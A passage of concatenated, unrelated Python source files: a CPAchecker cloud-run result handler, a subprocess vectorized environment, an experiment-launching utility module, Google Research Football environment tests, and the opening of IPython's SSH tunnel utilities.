message = 'Error 503: Service Unavailable.'
if counter < 5:
logging.debug(message)
sleep(60)
continue
else:
message += response.read().decode('UTF-8')
logging.warning(message)
raise urllib2.HTTPError(path, response.getcode(), message , response.getheaders(), None)
def _get_connection(self):
connection = getattr(self._thread_local, 'connection', None)
if connection is None:
if self._webclient.scheme == 'http':
self._thread_local.connection = AutoCloseHTTPConnection(self._webclient.netloc, timeout=CONNECTION_TIMEOUT)
elif self._webclient.scheme == 'https':
self._thread_local.connection = AutoCloseHTTPSConnection(self._webclient.netloc, timeout=CONNECTION_TIMEOUT)
else:
raise WebClientError("Unknown protocol {0}.".format(self._webclient.scheme))
connection = self._thread_local.connection
return connection
def _open_output_log(output_path):
log_file_path = output_path + "output.log"
logging.info('Log file is written to ' + log_file_path + '.')
return open(log_file_path, 'wb')
def _handle_run_info(values):
values["memUsage"] = int(values.pop("memory").strip('B'))
# remove irrelevant columns
values.pop("command", None)
values.pop("returnvalue", None)
values.pop("timeLimit", None)
values.pop("coreLimit", None)
values.pop("memoryLimit", None)
values.pop("outerwalltime", None)
values.pop("cpuCores", None)
values.pop("cpuCoresDetails", None)
values.pop("memoryNodes", None)
values.pop("memoryNodesAllocation", None)
print("Run Information:")
for key in sorted(values.keys()):
if not key.startswith("@"):
print ('\t' + str(key) + ": " + str(values[key]))
return int(values["exitcode"])
def _handle_host_info(values):
print("Host Information:")
for key in sorted(values.keys()):
print ('\t' + str(key) + ": " + str(values[key]))
def _handle_special_files(result_zip_file, files, output_path):
logging.info("Results are written to %s", output_path)
for file in SPECIAL_RESULT_FILES:
if file in files and file != RESULT_FILE_LOG:
result_zip_file.extract(file, output_path)
def handle_result(zip_content, output_path, run_identifier, result_files_pattern='*',
open_output_log=_open_output_log,
handle_run_info=_handle_run_info,
handle_host_info=_handle_host_info,
handle_special_files=_handle_special_files,
):
"""
Parses the given result ZIP archive: Extract meta information
and pass it on to the given handler functions.
The default handler functions print some relevant info and write it all to 'output_path'.
@return: the return value of CPAchecker
"""
# unzip and read result
return_value = None
try:
try:
with zipfile.ZipFile(io.BytesIO(zip_content)) as result_zip_file:
return_value = _handle_result(result_zip_file, output_path,
open_output_log, handle_run_info, handle_host_info, handle_special_files,
result_files_pattern, run_identifier)
except zipfile.BadZipfile:
logging.warning('Server returned illegal zip file with results of run %s.', run_identifier)
# Dump ZIP to disk for debugging
with open(output_path + '.zip', 'wb') as zip_file:
zip_file.write(zip_content)
except IOError as e:
logging.warning('Error while writing results of run %s: %s', run_identifier, e)
return return_value
def _handle_result(resultZipFile, output_path,
open_output_log, handle_run_info, handle_host_info, handle_special_files,
result_files_pattern, run_identifier):
files = set(resultZipFile.namelist())
# extract run info
if RESULT_FILE_RUN_INFO in files:
with resultZipFile.open(RESULT_FILE_RUN_INFO) as runInformation:
return_value = handle_run_info(_parse_cloud_file(runInformation))
else:
return_value = None
logging.warning('Missing result for run %s.', run_identifier)
# extract host info
if RESULT_FILE_HOST_INFO in files:
with resultZipFile.open(RESULT_FILE_HOST_INFO) as hostInformation:
handle_host_info(_parse_cloud_file(hostInformation))
else:
logging.warning('Missing host information for run %s.', run_identifier)
# extract log file
if RESULT_FILE_LOG in files:
with open_output_log(output_path) as log_file:
with resultZipFile.open(RESULT_FILE_LOG) as result_log_file:
for line in result_log_file:
log_file.write(line)
else:
logging.warning('Missing log file for run %s.', run_identifier)
handle_special_files(resultZipFile, files, output_path)
# extract result files:
if result_files_pattern:
files = files - SPECIAL_RESULT_FILES
files = fnmatch.filter(files, result_files_pattern)
if files:
resultZipFile.extractall(output_path, files)
return return_value
def _parse_cloud_file(file):
"""
Parses a file containing key value pairs in each line.
@return: a dict of the parsed key value pairs.
"""
values = {}
for line in file:
(key, value) = line.decode('utf-8').split("=", 1)
value = value.strip()
values[key] = value
return values
|
subproc_vec_env.py
|
import numpy as np
from multiprocessing import Process, Pipe
from vec_env import VecEnv, CloudpickleWrapper
def worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.x()
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.find_action(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'reset_task':
ob = env.reset_task()
remote.send(ob)
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
else:
raise NotImplementedError
class SubprocVecEnv(VecEnv):
def __init__(self, env_fns, spaces=None):
"""
envs: list of gym environments to run in subprocesses
"""
self.waiting = False
self.closed = False
nenvs = len(env_fns)
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
return np.stack([remote.recv() for remote in self.remotes])
def reset_task(self):
for remote in self.remotes:
remote.send(('reset_task', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
self.closed = True
|
util.py
|
import sys
import os
import json
import numpy as np
from itertools import cycle
from config import BASE_DIR, DATA_DIR
""" Custom Logger """
import sys
class Logger:
def __init__(self, filename):
self.console = sys.stdout
self.file = open(filename, 'w')
def write(self, message):
self.console.write(message)
self.file.write(message)
def flush(self):
self.console.flush()
self.file.flush()
""" Async executer """
import multiprocessing
class AsyncExecutor:
def __init__(self, n_jobs=1):
self.num_workers = n_jobs if n_jobs > 0 else multiprocessing.cpu_count()
self._pool = []
self._populate_pool()
def run(self, target, *args_iter, verbose=False):
workers_idle = [False] * self.num_workers
tasks = list(zip(*args_iter))
n_tasks = len(tasks)
while not all(workers_idle):
for i in range(self.num_workers):
if not self._pool[i].is_alive():
self._pool[i].terminate()
if len(tasks) > 0:
if verbose:
print(n_tasks-len(tasks))
next_task = tasks.pop(0)
self._pool[i] = _start_process(target, next_task)
else:
workers_idle[i] = True
def _populate_pool(self):
self._pool = [_start_process(_dummy_fun) for _ in range(self.num_workers)]
def _start_process(target, args=None):
if args:
p = multiprocessing.Process(target=target, args=args)
else:
p = multiprocessing.Process(target=target)
p.start()
return p
def _dummy_fun():
pass
""" Command generators """
def generate_base_command(module, flags=None, unbuffered=True):
""" Module is a python file to execute """
interpreter_script = sys.executable
base_exp_script = os.path.abspath(module.__file__)
if unbuffered:
base_cmd = interpreter_script + ' -u ' + base_exp_script
else:
base_cmd = interpreter_script + ' ' + base_exp_script
if flags is not None:
assert isinstance(flags, dict), "Flags must be provided as dict"
for flag, setting in flags.items():
if type(setting) == bool:
if setting:
base_cmd += f" --{flag}"
else:
base_cmd += f" --{flag}={setting}"
return base_cmd
def generate_run_commands(command_list, num_cpus=1, num_gpus=1, dry=False, n_hosts=1, mem=6000, long=False, mode='local',
experiment_name='run', promt=True, oci_shape='VM.Standard.E3.Flex.16', run_ids=None):
if mode == 'leonhard':
cluster_cmds = []
bsub_cmd = 'bsub ' + \
f'-W {23 if long else 3}:59 ' + \
f'-R "rusage[mem={mem}]" ' + \
f'-R "rusage[ngpus_excl_p={num_gpus}]" ' + \
f'-n {num_cpus} ' + \
f'-R "span[hosts={n_hosts}]" '
for python_cmd in command_list:
cluster_cmds.append(bsub_cmd + python_cmd)
if promt:
answer = input(f"About to submit {len(cluster_cmds)} compute jobs to the cluster. Proceed? [yes/no]")
else:
answer = 'yes'
if answer == 'yes':
for cmd in cluster_cmds:
if dry:
print(cmd)
else:
os.system(cmd)
elif mode == 'oci':
import oci_launcher.mode as mode
import oci_launcher.mount as mount
from datetime import datetime
from oci_launcher.launch import launch_python
if promt:
answer = input(f"About to launch {len(command_list)} OCI instances. Proceed? [yes/no]")
else:
answer = 'yes'
if answer == 'yes':
def launch_command_oci(command, run_id):
target_file = command.split(" ")[1]
cmd_args = " ".join(command.split(" ")[2:])
REMOTE_PYTHON_INTERPRETER = '/home/ubuntu/miniconda3/envs/meta-bo/bin/python -u'
# import oci_launcher.ssh as ssh
# from oci_launcher.config import SSH_KEY_FILE
# mode_ssh = mode.SSH(
# credentials=ssh.SSHCredentials(hostname='152.67.66.222', username='ubuntu', identity_file=SSH_KEY_FILE),
# )
mode_oci = mode.OCIMode(oci_shape=oci_shape, run_id=run_id)
MODE = mode_oci
mounts = [
mount.MountLocal(local_dir=BASE_DIR + '/', mount_point='/home/ubuntu/meta-bo-febo',
pythonpath=True, filter_dir=['runs/*']),
mount.MountDropbox(mount_point='/home/ubuntu/meta-bo-febo/runs', dropbox_path='/meta-bo-febo_runs',
output=True,
skip_folders='runs')
]
launch_python(target=target_file, mount_points=mounts,
target_mount_dir='/home/ubuntu/meta-bo-febo',
mode=MODE, args=cmd_args, verbose=True,
python_cmd=REMOTE_PYTHON_INTERPRETER, tmux=True,
stdout_file='/home/ubuntu/meta-bo-febo/runs/%s.out' % run_id,
install_packages=['psutil'])
if run_ids is None:
run_ids = ['%s_%s_%s_%s'%(experiment_name, datetime.now().strftime("%d-%m-%y_%H:%M:%S"),
str(abs(cmd.__hash__())), np.random.randint(10**4)) for cmd in command_list]
else:
run_ids = ['%s_%s_%s' % (exp_id, datetime.now().strftime("%d-%m-%y_%H:%M:%S"), np.random.randint(10**4)) for exp_id in run_ids]
assert len(run_ids) == len(command_list)
exec = AsyncExecutor(n_jobs=len(command_list))
exec.run(launch_command_oci, command_list, run_ids)
elif mode == 'local':
if promt:
answer = input(f"About to run {len(command_list)} jobs in a loop. Proceed? [yes/no]")
else:
answer = 'yes'
if answer == 'yes':
for cmd in command_list:
if dry:
print(cmd)
else:
os.system(cmd)
elif mode == 'local_async':
if promt:
answer = input(f"About to launch {len(command_list)} commands in {num_cpus} local processes. Proceed? [yes/no]")
else:
answer = 'yes'
if answer == 'yes':
if dry:
for cmd in command_list:
print(cmd)
else:
exec = AsyncExecutor(n_jobs=num_cpus)
cmd_exec_fun = lambda cmd: os.system(cmd)
exec.run(cmd_exec_fun, command_list)
else:
raise NotImplementedError
""" Hashing and Encoding dicts to JSON """
class NumpyArrayEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.integer):
return int(obj)
elif isinstance(obj, np.floating):
return float(obj)
elif isinstance(obj, np.ndarray):
return obj.tolist()
else:
return super(NumpyArrayEncoder, self).default(obj)
def hash_dict(d):
return str(abs(json.dumps(d, sort_keys=True, cls=NumpyArrayEncoder).__hash__()))
if __name__ == '__main__':
load_meta_data('/home/jonasrothfuss/Dropbox/Eigene_Dateien/ETH/02_Projects/16_Inspire_Meta_BO/inspire_safe_meta_bo/data/gp_ucb_meta_data/RandomMixtureMetaEnv_20_tasks_20_samples.json')
|
football_env_test.py
|
# coding=utf-8
# Copyright 2019 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Football environment E2E test."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import multiprocessing
from multiprocessing import pool
from multiprocessing import Queue
import gfootball
import os
import random
import threading
import zlib
from gfootball.env import config
from gfootball.env import football_action_set
from gfootball.env import football_env
from gfootball.env import observation_rotation
from gfootball.env import scenario_builder
import numpy as np
import psutil
from six.moves import range
import unittest
fast_run = False
def observation_hash(observation, hash_value = 0):
for obs in observation:
hash_value = zlib.adler32(
str(tuple(sorted(obs.items()))).encode(), hash_value)
return hash_value
def compute_hash(env, actions, extensive=False):
"""Computes hash of observations returned by environment for a given scenario.
Args:
env: environment
actions: number of actions
extensive: whether to run full episode
Returns:
hash
"""
o = env.reset()
hash_value = observation_hash(o)
done = False
step = 0
while not done:
o, _, done, _ = env.step(step % actions)
hash_value = observation_hash(o, hash_value)
step += 1
if not extensive and step >= 200:
break
return hash_value
def run_scenario(cfg, seed, queue, actions, render=False, validation=True):
env = football_env.FootballEnv(cfg)
if render:
env.render()
env.reset()
if validation:
env.tracker_setup(0, 999999999999999)
done = False
for action in actions:
obs, _, done, _ = env.step([action, action])
queue.put(obs)
if done:
break
queue.put(None)
env.close()
def normalize_observation(o):
if o['ball'][0] == -0:
o['ball'][0] = 0
if o['ball'][1] == -0:
o['ball'][1] = 0
if o['ball_direction'][0] == -0:
o['ball_direction'][0] = 0
if o['ball_direction'][1] == -0:
o['ball_direction'][1] = 0
class FootballEnvTest(parameterized.TestCase):
def compare_observations(self, l1, l2):
for o1, o2 in zip(l1, l2):
if 'frame' in o1 and 'frame' not in o2:
del o1['frame']
elif 'frame' in o2 and 'frame' not in o1:
del o2['frame']
normalize_observation(o1)
normalize_observation(o2)
o1 = str(tuple(sorted(o1.items())))
o2 = str(tuple(sorted(o2.items())))
self.assertEqual(o1, o2)
def check_determinism(self, extensive=False):
"""Check that environment is deterministic."""
if 'UNITTEST_IN_DOCKER' in os.environ:
return
cfg = config.Config({
'level': 'tests.11_vs_11_hard_deterministic'
})
env = football_env.FootballEnv(cfg)
actions = len(football_action_set.get_action_set(cfg))
for episode in range(1 if extensive else 2):
hash_value = compute_hash(env, actions, extensive)
if extensive:
self.assertEqual(hash_value, 2258127135)
elif episode % 2 == 0:
self.assertEqual(hash_value, 716323440)
else:
self.assertEqual(hash_value, 1663893701)
env.close()
def test_score_empty_goal(self):
"""Score on an empty goal."""
cfg = config.Config()
env = football_env.FootballEnv(cfg)
cfg['level'] = 'academy_empty_goal'
last_o = env.reset()[0]
for _ in range(120):
o, reward, done, _ = env.step(football_action_set.action_right)
o = o[0]
if done:
self.assertEqual(reward, 1)
break
self.assertFalse(done)
self.assertGreaterEqual(o['ball'][0], last_o['ball'][0] - 0.01)
self.assertGreaterEqual(
o['left_team'][o['active']][0],
last_o['left_team'][last_o['active']][0] - 0.01)
last_o = o
self.assertTrue(done)
env.close()
def test_render(self):
"""Make sure rendering is not broken."""
if 'UNITTEST_IN_DOCKER' in os.environ:
# Rendering is not supported.
return
cfg = config.Config({
'level': 'tests.11_vs_11_hard_deterministic',
})
env = football_env.FootballEnv(cfg)
env.render()
o = env.reset()
hash = observation_hash(o)
for _ in range(10):
o, _, _, _ = env.step(football_action_set.action_right)
hash = observation_hash(o, hash)
self.assertEqual(hash, 845594868)
env.close()
def test_dynamic_render(self):
"""Verifies dynamic render support."""
if 'UNITTEST_IN_DOCKER' in os.environ:
# Rendering is not supported.
return
cfg = config.Config({
'level': 'tests.11_vs_11_hard_deterministic',
})
env = football_env.FootballEnv(cfg)
o = env.reset()
for _ in range(10):
o, _, _, _ = env.step(football_action_set.action_right)
self.assertNotIn('frame', o[0])
env.render()
self.assertIn('frame', env.observation()[0])
self.compare_observations(o, env.observation())
o, _, _, _ = env.step(football_action_set.action_right)
self.assertIn('frame', env.observation()[0])
env.disable_render()
self.compare_observations(o, env.observation())
env.close()
def test_different_action_formats(self):
"""Verify different action formats are accepted."""
cfg = config.Config()
env = football_env.FootballEnv(cfg)
env.reset()
env.step(football_action_set.action_right)
env.step([football_action_set.action_right])
env.step(np.array([football_action_set.action_right]))
env.step(np.array(football_action_set.action_right))
env.close()
def test_determinism_extensive(self):
self.check_determinism(extensive=True)
def test_determinism(self):
self.check_determinism()
def test_multi_instance(self):
"""Validates that two instances of the env can run in the same thread."""
tpool = pool.ThreadPool(processes=2)
run1 = tpool.apply_async(self.check_determinism)
run2 = tpool.apply_async(self.check_determinism)
run1.get()
run2.get()
def test_multi_render(self):
"""Only one rendering instance allowed at a time."""
if 'UNITTEST_IN_DOCKER' in os.environ:
# Rendering is not supported.
return
cfg = config.Config({})
env1 = football_env.FootballEnv(cfg)
env1.render()
env1.reset()
env2 = football_env.FootballEnv(cfg)
try:
env2.render()
except AssertionError:
env1.close()
env2.close()
# It is still possible to render.
env3 = football_env.FootballEnv(cfg)
env3.reset()
env3.close()
return
assert False, 'Exception expected'
def test_scenarios_are_at_least_loading(self):
cfg = config.Config()
for l in scenario_builder.all_scenarios():
cfg['level'] = l
unused_game_cfg = cfg.ScenarioConfig()
def memory_usage(self):
process = psutil.Process(os.getpid())
return process.memory_info().rss
def test__memory_usage(self):
"""Make sure memory usage is low when not recording videos."""
# This test has to go first, so that memory usage is not affected.
if 'UNITTEST_IN_DOCKER' in os.environ:
# Forge doesn't support rendering.
return
cfg = config.Config({'write_video': False})
env = football_env.FootballEnv(cfg)
env.render()
env.reset()
initial_memory = self.memory_usage()
for _ in range(100):
_, _, _, _ = env.step(football_action_set.action_right)
memory_usage = self.memory_usage() - initial_memory
env.close()
self.assertGreaterEqual(10000000, memory_usage)
def test_player_order_invariant(self):
"""Checks that environment behaves the same regardless of players order."""
players = ['agent:right_players=1', 'lazy:left_players=11']
cfg = config.Config({
'level': 'tests.11_vs_11_hard_deterministic',
'players': players
})
env = football_env.FootballEnv(cfg)
actions = len(football_action_set.get_action_set(cfg))
hash_value1 = compute_hash(env, actions)
players = [players[1], players[0]]
cfg = config.Config({
'level': 'tests.11_vs_11_hard_deterministic',
'players': players
})
env = football_env.FootballEnv(cfg)
hash_value2 = compute_hash(env, actions)
self.assertEqual(hash_value1, hash_value2)
env.close()
@parameterized.parameters(range(1))
def test_setstate(self, seed):
"""Checks setState functionality."""
cfg1 = config.Config({
'level': 'tests.symmetric',
'game_engine_random_seed': seed,
'reverse_team_processing' : False
})
cfg2 = config.Config({
'level': 'tests.symmetric',
'game_engine_random_seed': seed + 10,
'reverse_team_processing' : False
})
env1 = football_env.FootballEnv(cfg1)
env2 = football_env.FootballEnv(cfg2)
initial_obs = env1.reset()
env2.reset()
initial_state = env1.get_state()
env2.set_state(initial_state)
random.seed(seed)
actions = len(football_action_set.get_action_set(cfg1))
first_action = random.randint(0, actions - 1)
first_obs, _, _, _ = env1.step(first_action)
_, _, _, _ = env2.step(first_action)
step = 0
limit = 10 if fast_run else 3000
while step < limit:
step += 1
action = random.randint(0, actions - 1)
if step % 10 == 0:
env2.set_state(initial_state)
self.compare_observations(initial_obs, env2.observation())
env2.step(first_action)
self.compare_observations(first_obs, env2.observation())
env2.set_state(env1.get_state())
self.compare_observations(env1.observation(), env2.observation())
_, _, done1, _ = env1.step(action)
_, _, done2, _ = env2.step(action)
self.assertEqual(done1, done2)
if done1:
break
env1.close()
env2.close()
@parameterized.parameters(range(1))
def test_symmetry(self, seed):
"""Checks game symmetry."""
processes = []
cfg1 = config.Config({
'level': 'tests.symmetric',
'game_engine_random_seed': seed,
'players': ['agent:left_players=1,right_players=1'],
'reverse_team_processing': False,
})
cfg2 = config.Config({
'level': 'tests.symmetric',
'game_engine_random_seed': seed,
'players': ['agent:left_players=1,right_players=1'],
'reverse_team_processing': True,
})
random.seed(seed)
action_cnt = len(football_action_set.get_action_set(cfg1))
actions = [random.randint(0, action_cnt - 1) for _ in range(10 if fast_run else 3000)]
queue1 = Queue()
thread1 = threading.Thread(
target=run_scenario, args=(cfg1, seed, queue1, actions))
thread1.start()
queue2 = Queue()
thread2 = threading.Thread(
target=run_scenario, args=(cfg2, seed, queue2, actions))
thread2.start()
while True:
o1 = queue1.get()
o2 = queue2.get()
if not o1 or not o2:
self.assertEqual(o1, o2)
break
self.compare_observations(o1[:1], o2[1:])
self.compare_observations(o2[:1], o1[1:])
thread1.join()
thread2.join()
@parameterized.parameters((1, 'left', True), (0, 'right', True),
(1, 'left', False), (0, 'right', False))
def offside_helper(self, episode, team2, reverse):
cfg = config.Config({
'level': 'tests.offside_test',
'players': ['agent:{}_players=1'.format(team2)],
'episode_number': episode,
'reverse_team_processing': reverse,
})
env = football_env.FootballEnv(cfg)
env.reset()
o, _, done, _ = env.step(football_action_set.action_long_pass)
done = False
while not done and o[0]['right_team'][1][0] == 0:
o, _, done, _ = env.step(football_action_set.action_idle)
self.assertAlmostEqual(o[0]['ball'][0], 0.6, delta=0.4)
self.assertAlmostEqual(o[0]['right_team'][0][0], 0.6, delta=0.4)
self.assertAlmostEqual(o[0]['right_team'][1][0], 0.6, delta=0.4)
self.assertAlmostEqual(o[0]['left_team'][0][0], -0.6, delta=0.4)
self.assertAlmostEqual(o[0]['left_team'][1][0], -0.6, delta=0.4)
env.close()
@parameterized.parameters((0, 1, True), (1, -1, True), (0, 1, False),
(1, -1, False))
def test_corner(self, episode, factor, reverse):
cfg = config.Config({
'level': 'tests.corner_test',
'players': ['agent:left_players=1,right_players=1'],
'episode_number': episode,
'reverse_team_processing': reverse,
})
env = football_env.FootballEnv(cfg)
o = env.reset()
done = False
while not done:
o, _, done, _ = env.step([football_action_set.action_left, football_action_set.action_left])
self.assertAlmostEqual(o[0]['ball'][0], -0.95 * factor, delta=0.1)
self.assertAlmostEqual(o[0]['ball'][1], 0.4 * factor, delta=0.1)
self.assertAlmostEqual(o[0]['right_team'][0][0], 1, delta=0.1)
self.assertAlmostEqual(o[0]['right_team'][1][0], -0.95 * factor, delta=0.1)
self.assertAlmostEqual(o[0]['left_team'][0][0], -0.95, delta=0.1)
self.assertAlmostEqual(o[0]['left_team'][1][0], -0.9 * factor, delta=0.2)
env.close()
def test_penalty(self):
cfg = config.Config({
'level': 'tests.penalty',
'players': ['agent:left_players=1'],
})
env = football_env.FootballEnv(cfg)
o = env.reset()
done = False
while not done:
o, _, done, _ = env.step([football_action_set.action_sliding])
self.assertAlmostEqual(o[0]['ball'][0], -0.809, delta=0.01)
self.assertAlmostEqual(o[0]['ball'][1], 0.0, delta=0.01)
self.assertAlmostEqual(o[0]['right_team'][0][0], 1, delta=0.1)
self.assertAlmostEqual(o[0]['right_team'][1][0], -0.75, delta=0.1)
self.assertAlmostEqual(o[0]['left_team'][0][0], -0.95, delta=0.1)
self.assertAlmostEqual(o[0]['left_team'][1][0], -0.70, delta=0.1)
env.close()
@parameterized.parameters((0, -1, True), (1, 1, True), (0, -1, False),
(1, 1, False))
def test_keeper_ball(self, episode, factor, reverse):
cfg = config.Config({
'level': 'tests.keeper_test',
'players': ['agent:left_players=1,right_players=1'],
'episode_number': episode,
'reverse_team_processing': reverse,
})
env = football_env.FootballEnv(cfg)
o = env.reset()
done = False
while not done:
o, _, done, _ = env.step([football_action_set.action_right, football_action_set.action_right])
self.assertAlmostEqual(o[0]['ball'][0], -1.0 * factor, delta=0.1)
self.assertAlmostEqual(o[0]['ball'][1], 0.0, delta=0.1)
self.assertAlmostEqual(o[0]['right_team'][0][0], 1, delta=0.1)
self.assertAlmostEqual(o[0]['right_team'][1][0], 0.4, delta=0.1)
self.assertAlmostEqual(o[0]['left_team'][0][0], -0.9, delta=0.1)
self.assertAlmostEqual(o[0]['left_team'][1][0], -0.33, delta=0.1)
env.close()
@parameterized.parameters((0, True), (1, True), (0, False), (1, False))
def test_goal(self, episode, reverse):
cfg = config.Config({
'level': 'tests.goal_test',
'players': ['agent:left_players=1,right_players=1'],
'episode_number': episode,
'reverse_team_processing': reverse,
})
env = football_env.FootballEnv(cfg)
o = env.reset()
done = False
while not done:
o, _, done, _ = env.step(
[football_action_set.action_right, football_action_set.action_right])
self.assertAlmostEqual(o[0]['ball'][0], 0.0, delta=0.1)
self.assertEqual(o[0]['score'][episode], 1)
self.assertEqual(o[0]['score'][1 - episode], 0)
env.close()
@parameterized.parameters(range(1))
def test_render_state_equals_norender(self, seed):
"""Checks that rendering game state is the same as non-rendering."""
if 'UNITTEST_IN_DOCKER' in os.environ:
# Forge doesn't support rendering.
return
processes = []
cfg1 = config.Config({
'level': 'tests.symmetric',
'game_engine_random_seed': seed,
'players': ['agent:left_players=1,right_players=1'],
'reverse_team_processing': False,
})
cfg2 = config.Config({
'level': 'tests.symmetric',
'game_engine_random_seed': seed,
'players': ['agent:left_players=1,right_players=1'],
'reverse_team_processing': False,
})
random.seed(seed)
action_cnt = len(football_action_set.get_action_set(cfg1))
actions = [random.randint(0, action_cnt - 1) for _ in range(50)]
queue1 = Queue()
thread1 = threading.Thread(
target=run_scenario, args=(cfg1, seed, queue1, actions, False, False))
thread1.start()
queue2 = Queue()
thread2 = threading.Thread(
target=run_scenario, args=(cfg2, seed, queue2, actions, True, False))
thread2.start()
while True:
o1 = queue1.get()
o2 = queue2.get()
if not o1 or not o2:
self.assertEqual(o1, o2)
break
self.compare_observations(o1, o2)
thread1.join()
thread2.join()
def test_get_state_wrapper(self):
env = gfootball.env.create_environment(
stacked=True,
env_name='academy_empty_goal',
rewards='checkpoints,scoring')
o = env.reset()
state = env.get_state()
reward1 = 0
hash1 = 0
while reward1 < 0.9:
o, r, _, _ = env.step(football_action_set.action_right)
reward1 += r
hash1 = zlib.adler32(o, hash1)
self.assertAlmostEqual(reward1, 0.9, delta=0.01)
env.set_state(state)
hash2 = 0
reward2 = 0
while reward2 < 0.9:
o, r, _, _ = env.step(football_action_set.action_right)
reward2 += r
hash2 = zlib.adler32(o, hash2)
self.assertAlmostEqual(reward2, 0.9, delta=0.01)
self.assertEqual(hash1, hash2)
def test_restore_after_reset(self):
cfg = config.Config({
'level': '11_vs_11_competition',
})
env = football_env.FootballEnv(cfg)
obs = env.reset()
state = env.get_state()
env.reset()
env.set_state(state)
obs_ = env.observation()
state_ = env.get_state()
env.step(0) # Test if can take step
self.compare_observations(obs, obs_)
self.assertEqual(state, state_)
if __name__ == '__main__':
unittest.main(failfast=True)
|
tunnel.py
|
"""Basic ssh tunnel utilities, and convenience functions for tunneling
zeromq connections.
Authors
-------
* Min RK
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2010-2011 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
from __future__ import print_function
import os,sys, atexit
import socket
from multiprocessing import Process
from getpass import getpass, getuser
import warnings
try:
with warnings.catch_warnings():
warnings.simplefilter('ignore', DeprecationWarning)
import paramiko
except ImportError:
paramiko = None
else:
from forward import forward_tunnel
try:
from IPython.external import pexpect
except ImportError:
pexpect = None
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
# select_random_ports copied from IPython.parallel.util
_random_ports = set()
def select_random_ports(n):
"""Selects and return n random ports that are available."""
ports = []
for i in xrange(n):
sock = socket.socket()
sock.bind(('', 0))
while sock.getsockname()[1] in _random_ports:
sock.close()
sock = socket.socket()
sock.bind(('', 0))
ports.append(sock)
for i, sock in enumerate(ports):
port = sock.getsockname()[1]
sock.close()
ports[i] = port
_random_ports.add(port)
return ports
#-----------------------------------------------------------------------------
# Check for passwordless login
#-----------------------------------------------------------------------------
def try_passwordless_ssh(server, keyfile, paramiko=None):
"""Attempt to make an ssh connection without a password.
This is mainly used for requiring password input only once
when many tunnels may be connected to the same server.
If paramiko is None, the default for the platform is chosen.
"""
if paramiko is None:
paramiko = sys.platform == 'win32'
if not paramiko:
f = _try_passwordless_openssh
else:
f = _try_passwordless_paramiko
return f(server, keyfile)
def _try_passwordless_openssh(server, keyfile):
"""Try passwordless login with shell ssh command."""
if pexpect is None:
raise ImportError("pexpect unavailable, use paramiko")
cmd = 'ssh -f '+ server
if keyfile:
cmd += ' -i ' + keyfile
cmd += ' exit'
p = pexpect.spawn(cmd)
while True:
try:
p.expect('[Pp]assword:', timeout=.1)
except pexpect.TIMEOUT:
continue
except pexpect.EOF:
return True
else:
return False
def _try_passwordless_paramiko(server, keyfile):
"""Try passwordless login with paramiko."""
if paramiko is None:
msg = "Paramiko unavaliable, "
if sys.platform == 'win32':
msg += "Paramiko is required for ssh tunneled connections on Windows."
else:
msg += "use OpenSSH."
raise ImportError(msg)
username, server, port = _split_server(server)
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
try:
client.connect(server, port, username=username, key_filename=keyfile,
look_for_keys=True)
except paramiko.AuthenticationException:
return False
else:
client.close()
return True
def tunnel_connection(socket, addr, server, keyfile=None, password=None, paramiko=None, timeout=60):
"""Connect a socket to an address via an ssh tunnel.
This is a wrapper for socket.connect(addr), when addr is not accessible
from the local machine. It simply creates an ssh tunnel using the remaining args,
and calls socket.connect('tcp://localhost:lport') where lport is the randomly
selected local port of the tunnel.
"""
new_url, tunnel = open_tunnel(addr, server, keyfile=keyfile, password=password, paramiko=paramiko, timeout=timeout)
socket.connect(new_url)
return tunnel
def open_tunnel(addr, server, keyfile=None, password=None, paramiko=None, timeout=60):
"""Open a tunneled connection from a 0MQ url.
For use inside tunnel_connection.
Returns
-------
(url, tunnel): The 0MQ url that has been forwarded, and the tunnel object
"""
lport = select_random_ports(1)[0]
transport, addr = addr.split('://')
ip,rport = addr.split(':')
rport = int(rport)
if paramiko is None:
paramiko = sys.platform == 'win32'
if paramiko:
tunnelf = paramiko_tunnel
else:
tunnelf = openssh_tunnel
tunnel = tunnelf(lport, rport, server, remoteip=ip, keyfile=keyfile, password=password, timeout=timeout)
return 'tcp://127.0.0.1:%i'%lport, tunnel
def openssh_tunnel(lport, rport, server, remoteip='127.0.0.1', keyfile=None, password=None, timeout=60):
